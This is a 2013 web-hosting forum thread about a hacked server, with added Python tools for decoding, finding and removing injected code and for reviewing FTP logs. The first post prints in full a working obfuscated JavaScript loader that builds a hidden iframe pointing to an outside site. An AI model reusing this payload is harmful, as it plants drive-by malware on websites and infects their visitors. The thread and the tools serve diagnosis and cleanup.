Strange Code - Not Added By Me

Discussion in 'Security' started by dlwaldow, Apr 6, 2013.

  1. dlwaldow

    dlwaldow Member (cPanel Access Level: Root Administrator)

    I think I have some bug on my VPS (I have root access). In my index.php (and give it time, it'll spread to my header and footer.php too) I find this code:

    Code:
    <?
    #3b3cf8#
    echo " <script type=\"text/javascript\" language=\"javascript\" > asq=function(){return n[i];};ww=window;ss=String[\"fro\"+\"mC\"+\"harC\"+\"o\"+\"de\"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n=\"0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x75,0x7a,0x66,0x68,0x62,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x78,0x78,0x78,0x2f,0x71,0x73,0x6a,0x77,0x62,0x75,0x66,0x74,0x76,0x71,0x66,0x73,0x64,0x62,0x73,0x74,0x2f,0x64,0x70,0x6e,0x30,0x78,0x71,0x6a,0x6e,0x62,0x68,0x66,0x74,0x30,0x73,0x66,0x6d,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x75,0x7a,0x66,0x68,0x62,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x75,0x7a,0x66,0x68,0x62,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x75,0x7a,0x66,0x68,0x62,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x75,0x7a,0x66,0x68,0x62,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c\".split(\",\");h=2;s=\"\";if(whwej){for(i=0;i-510!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww[\"eval\"](\"\"+s);}}}}</script>";
    #/3b3cf8#
    ?>
    Does anyone know what this is and/or how to get rid of it? :/ I've had to completely reformat my server once before, but now I have a couple of clients on it and I don't want to blow their work out. It's been two to three weeks since the server reformat and this thing is back. I don't understand it. I'm not running joomla at all. These are simple php files that I've created without the help of any other software. The only other things I'm running are Piwigo gallery, fanupdate 3, phpbb (latest), and TheHostingTool. This thing was on the server (before the rebuild) and at the time phpbb and thehostingtool weren't installed. :/
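An added example, not part of the thread and not the poster's code: a small Python decoder for the obfuscation used in the pasted script. The payload keeps the real script as a comma-separated list of hex values, each one higher than the character it stands for, rebuilds the text in the browser with `String.fromCharCode(eval(n[i]) - 1)` and hands it to `eval`. The decoder does the same arithmetic as plain string work, so the hidden script can be read without executing anything (run over the full list from the post, it shows a short function that appends a 1px iframe to the page). Function names and the `SAMPLE_*` constants are mine; the nine-value prefix in the demo is copied from the pasted list.

```python
"""Static decoder for the hex-list / fromCharCode(x - 1) obfuscation seen above.

Added example, not code from the thread. Nothing from the sample is executed;
the list is turned back into text with the same offset the script uses.
"""
import re

OFFSET = 1  # the injected script subtracts 1 from every value before fromCharCode


def decode_hex_list(hex_list, offset=OFFSET):
    """'0x29,0x67,...' -> the text the browser would have passed to eval()."""
    out = []
    for token in hex_list.split(","):
        token = token.strip()
        if token:
            out.append(chr(int(token, 16) - offset))
    return "".join(out)


def encode_hex_list(text, offset=OFFSET):
    """Inverse of decode_hex_list; used here only to build a round-trip sample."""
    return ",".join(f"0x{ord(c) + offset:x}" for c in text)


def extract_hex_list(script_source):
    """Pull the quoted n=\"0x..,0x..\" list out of the injected PHP/JS text.
    The backslashes before the quotes are optional because the sample sits
    inside a PHP "..." string and escapes them."""
    m = re.search(r'n=\\?"((?:0x[0-9a-fA-F]+,?)+)\\?"', script_source)
    return m.group(1) if m else None


def decode_injected(script_source):
    """Find the list in a pasted snippet and decode it, or raise if none is present."""
    hex_list = extract_hex_list(script_source)
    if hex_list is None:
        raise ValueError('no n="0x.." list found')
    return decode_hex_list(hex_list)


# Constructed stand-in for the sample: a one-line script wrapped the way the
# thread's payload wraps its list (n=\"...\".split(\",\") inside a PHP echo).
SAMPLE_PLAIN = "var f = document.createElement('iframe');"
SAMPLE_INJECTED = (
    'echo "<script>n=\\"' + encode_hex_list(SAMPLE_PLAIN)
    + '\\".split(\\",\\");</script>";'
)

if __name__ == "__main__":
    # First nine values of the thread's own list decode to the start of the payload.
    print(repr(decode_hex_list("0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f")))
    print(decode_injected(SAMPLE_INJECTED))
```

Paste the whole `n=\"...\"` string from an infected file into `decode_injected` to see what the script would have done; the offset is a constant here, since other variants of this loader use a different one or none at all.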
     
  2. quietFinn

    quietFinn Well-Known Member, Finland (cPanel Access Level: Root Administrator)

    You got hacked.
     
  3. hostrazor

    hostrazor Member (cPanel Access Level: Root Administrator)

    Install rootkit / clamav and maldetect onto your server as root and then scan for malware
     
  4. dlwaldow

    dlwaldow Member (cPanel Access Level: Root Administrator)

    ClamAV and Maldetect found absolutely nothing at all. As far as rootkit, I have no idea where I can grab one for the server and install via ssh :/
     
  5. quietFinn

    quietFinn Well-Known Member, Finland (cPanel Access Level: Root Administrator)

    I have seen that a few times and every time it was uploaded using FTP, i.e. the hacker had got access to the customer's PC and got the cPanel/FTP username & password.

    Check FTP access logs in /var/log/messages
     
  6. dlwaldow

    dlwaldow Member (cPanel Access Level: Root Administrator)

    FTP access logs from a ? at the local IP. Do you know how to prevent this by chance?
     
  7. quietFinn

    quietFinn Well-Known Member, Finland (cPanel Access Level: Root Administrator)

    In /var/log/messages you see if someone has connected to that account using FTP, and in that case you see the IP address they connect from. Blocking that IP does not really help, but if you see that FTP has been used to upload those changed files then you know the way they have used.

    The password of that account must be changed of course, and the owner of that account (or anyone who had the password) must scan their PC very well.
     
  8. dlwaldow

    dlwaldow Member (cPanel Access Level: Root Administrator)

    I rebuilt my computer completely to get rid of the Trojan that was on it. I went back into cpanel to clean the files and am finding this instead. Is it the same thing?

    Code:
    <!--3b3cf8--><img src="http://localhost/" ><!--/3b3cf8-->
    Code:
    <?
    #3b3cf8#
    echo('<img src=\"http://localhost/\" >');
    #/3b3cf8#
    ?>
    Should I be going through SSH and finding all instances of this code?
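On the question of going through every file by hand: an added example, not from the thread and not the poster's code, that walks a web root for the two tagged forms posted so far (the `<? #3b3cf8# ... #/3b3cf8# ?>` PHP block and the `<!--3b3cf8--> ... <!--/3b3cf8-->` HTML comment) and strips them. The tag value and the sample blocks are taken from the posts above; `MARKER`, `scan_tree` and the other names are mine. File mtimes are recorded before anything is rewritten, because the timestamps are what you later match against the FTP and Apache logs.

```python
"""Locate and remove the '3b3cf8'-tagged blocks shown in this thread across a web root.

Added example, not the poster's code. The tag value comes from the samples in the
thread; another infection will use another tag.
"""
import re
import sys
from pathlib import Path

MARKER = "3b3cf8"

# Alternation order matters: the <? ... ?>-wrapped PHP form is tried before the bare
# one so the now-empty PHP tags are removed with the block instead of being left behind.
INJECTED = re.compile(
    rf"<\?(?:php)?\s*#{MARKER}#.*?#/{MARKER}#(?:\s*\?>)?"
    rf"|#{MARKER}#.*?#/{MARKER}#"
    rf"|<!--{MARKER}-->.*?<!--/{MARKER}-->",
    re.DOTALL,
)

TEXT_SUFFIXES = {".php", ".html", ".htm", ".js", ".inc", ".tpl"}


def find_blocks(text):
    """Every injected block in text, in document order."""
    return [m.group(0) for m in INJECTED.finditer(text)]


def strip_blocks(text):
    """Return (cleaned_text, number_of_blocks_removed)."""
    return INJECTED.subn("", text)


def scan_tree(root, fix=False):
    """Report {path: {"blocks": n, "mtime": t}} for every infected file under root.

    mtime is captured before any rewrite. With fix=True the original is kept as
    <name>.infected (evidence for the timeline) and a cleaned copy replaces it.
    Files are read as UTF-8 with replacement; check the encoding of anything
    unusual before letting fix=True write it back.
    """
    hits = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in TEXT_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        blocks = find_blocks(text)
        if not blocks:
            continue
        hits[str(path)] = {"blocks": len(blocks), "mtime": path.stat().st_mtime}
        if fix:
            path.with_name(path.name + ".infected").write_bytes(path.read_bytes())
            path.write_text(strip_blocks(text)[0], encoding="utf-8")
    return hits


# Constructed sample page carrying both shapes from the post above around real content.
SAMPLE_PAGE = (
    '<!--3b3cf8--><img src="http://localhost/" ><!--/3b3cf8-->\n'
    "<html><body>real content</body></html>\n"
    "<?\n#3b3cf8#\necho('<img src=\\\"http://localhost/\\\" >');\n#/3b3cf8#\n?>\n"
)

if __name__ == "__main__":
    roots = [a for a in sys.argv[1:] if not a.startswith("--")]
    if roots:
        for path, info in scan_tree(roots[0], fix="--fix" in sys.argv).items():
            print(f"{info['blocks']:3d} block(s)  mtime={info['mtime']:.0f}  {path}")
    else:
        cleaned, n = strip_blocks(SAMPLE_PAGE)
        print(f"removed {n} block(s):\n{cleaned}")
```

Run it as `python3 scan.py /home/user/public_html` to get the list and the mtimes first, and only add `--fix` once a clean backup exists; the `.infected` copies can be deleted when the investigation is done.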
     
  9. mattsh

    mattsh Registered (cPanel Access Level: Root Administrator)

    I'm also getting this on 2 sites on the same hosting. My personal site (hosted elsewhere) does not have this problem.

    Aside from scans, does anyone have any specific ideas on how to fix this?
     
  10. cPanelMichael

    cPanelMichael Forums Analyst, Staff Member (cPanel Access Level: Root Administrator)

    I recommend consulting with a qualified system administrator to investigate your system to determine how it was exploited. Note that if your server was rooted, reinstalling the OS/cPanel and restoring the accounts is typically the best way to ensure the server is cleaned.

    Thank you.
     
  11. quizknows

    quizknows Well-Known Member (cPanel Access Level: DataCenter Provider)

    I've seen this hack a ton of times. 99.99% of the time the server is not rooted: either your FTP password was used to upload the modified files, or your CMS had a weak admin password or old plugin used to modify the files.

    If you're lucky and you disabled cPanel's default 24 hour deletion of access logs for Apache, you can use the time stamps from the files to consult your apache domlogs to see if there is a malicious PHP script used around that time.

    You will ultimately need to remove the bad code or restore the infected files from a clean backup. At that time make sure you disable domlog deletion in WHM, or enable Raw Access Log archiving in cPanel for the domain; this way if it gets "hacked" again you can track it down.
     
  12. Aaron.Edwards

    Aaron.Edwards Active Member (cPanel Access Level: Root Administrator)

    Try this small shell script to check if someone tried to hack the user FTP accounts from the same IP address:

    Code:
    #!/bin/sh
    # Lists source IPs that authenticated to more than two different FTP accounts,
    # then the accounts each of those IPs used. "(?@ip)" entries are connections
    # that never authenticated and are skipped. $6 is the "(user@ip)" token in the
    # default syslog layout of /var/log/messages.
            awk '/pure-ftpd: \([^?].*/ { print $6 }' /var/log/messages* |
            sed 's/^(\(.*\))/\1/' |
            awk -F@ '{ if ($2) print $2 " " $1 }'  |
            sort | uniq |
            awk '{print $1}' |
            uniq -c |
            awk '{if ($1 > 2) print $2}' |
            while read ipaddr; do
                    echo ${ipaddr}:
                    awk '/pure-ftpd: \([^?].*@'${ipaddr}'\)/' /var/log/messages* |
                    sed 's/^.*(\([a-z0-9A-Z_][a-z0-9A-Z_]*\)@.*/\1/' |
                    sort | uniq
            done
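An added example, not code from the thread, covering the same ground as the shell script above and quietFinn's earlier advice (which IP logged in to which account) and adding the timestamp check quizknows suggests: list the FTP activity around an infected file's mtime to tie the change to a session. The log lines are constructed in the pure-ftpd syslog layout the thread is about, with `(?@ip)` pre-authentication entries skipped the way the script skips them; the function names are mine and the addresses come from the documentation ranges 203.0.113.0/24 and 198.51.100.0/24.

```python
"""Who used FTP to log in to which account, from pure-ftpd lines in /var/log/messages.

Added example, not code from the thread. Feed it the real file with
parse_events(open("/var/log/messages"), year); the lines below are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

EVENT_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"\S+ pure-ftpd: \((?P<user>[^@)]+)@(?P<ip>[^)]+)\) (?P<msg>.*)$"
)

SAMPLE_LINES = [  # constructed sample, pure-ftpd syslog layout
    "Apr  6 02:11:09 vps pure-ftpd: (?@203.0.113.5) [INFO] New connection from 203.0.113.5",
    "Apr  6 02:11:10 vps pure-ftpd: (clientone@203.0.113.5) [INFO] clientone is now logged in",
    "Apr  6 02:11:12 vps pure-ftpd: (clientone@203.0.113.5) [NOTICE] /home/clientone//public_html/index.php uploaded  (1534 bytes, 48.2KB/sec)",
    "Apr  6 02:14:40 vps pure-ftpd: (clienttwo@203.0.113.5) [INFO] clienttwo is now logged in",
    "Apr  6 02:15:02 vps pure-ftpd: (clientthree@203.0.113.5) [INFO] clientthree is now logged in",
    "Apr  6 09:30:00 vps pure-ftpd: (clientone@198.51.100.20) [INFO] clientone is now logged in",
    "Apr  6 09:31:00 vps pure-ftpd: (?@198.51.100.20) [WARNING] Authentication failed for user [clientone]",
]


def parse_events(lines, year):
    """(timestamp, account, ip, message) for every authenticated pure-ftpd line.
    syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in lines:
        m = EVENT_RE.match(line.rstrip("\n"))
        if not m or m["user"] == "?":  # "(?@ip)" = not authenticated yet
            continue
        ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["user"], m["ip"], m["msg"]))
    return events


def ips_per_account(events):
    """Source IPs that authenticated to each account, to compare with the owner's usual IP."""
    seen = defaultdict(set)
    for _, user, ip, _ in events:
        seen[user].add(ip)
    return {user: sorted(ips) for user, ips in seen.items()}


def shared_source_ips(events, min_accounts=3):
    """IPs that logged in to at least min_accounts different accounts (the script's "> 2"):
    one customer's PC rarely holds three customers' passwords, a stolen list does."""
    accounts = defaultdict(set)
    for _, user, ip, _ in events:
        accounts[ip].add(user)
    return {ip: sorted(users) for ip, users in accounts.items() if len(users) >= min_accounts}


def uploads(events):
    """Upload entries only: the sessions that could have written the modified files."""
    return [e for e in events if " uploaded " in e[3]]


def events_around(events, when, minutes=30):
    """FTP activity within +/- minutes of a file's mtime."""
    window = timedelta(minutes=minutes)
    return [e for e in events if abs(e[0] - when) <= window]


if __name__ == "__main__":
    events = parse_events(SAMPLE_LINES, 2013)
    print("IPs per account:", ips_per_account(events))
    print("IPs touching 3+ accounts:", shared_source_ips(events))
    print("uploads:", [(ts.isoformat(), user, ip) for ts, user, ip, _ in uploads(events)])
    # The mtime of the infected index.php would come from os.stat(); constructed here.
    mtime = datetime(2013, 4, 6, 2, 12, 0)
    for ts, user, ip, msg in events_around(events, mtime, minutes=2):
        print(ts, user, ip, msg)
```

The upload entry and the two later logins from the same address are the pattern quietFinn describes: one machine holding several customers' FTP passwords. Rotated logs (`/var/log/messages.1` and so on) can be concatenated into the same call, with the year adjusted where a rotation crosses January.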
    
     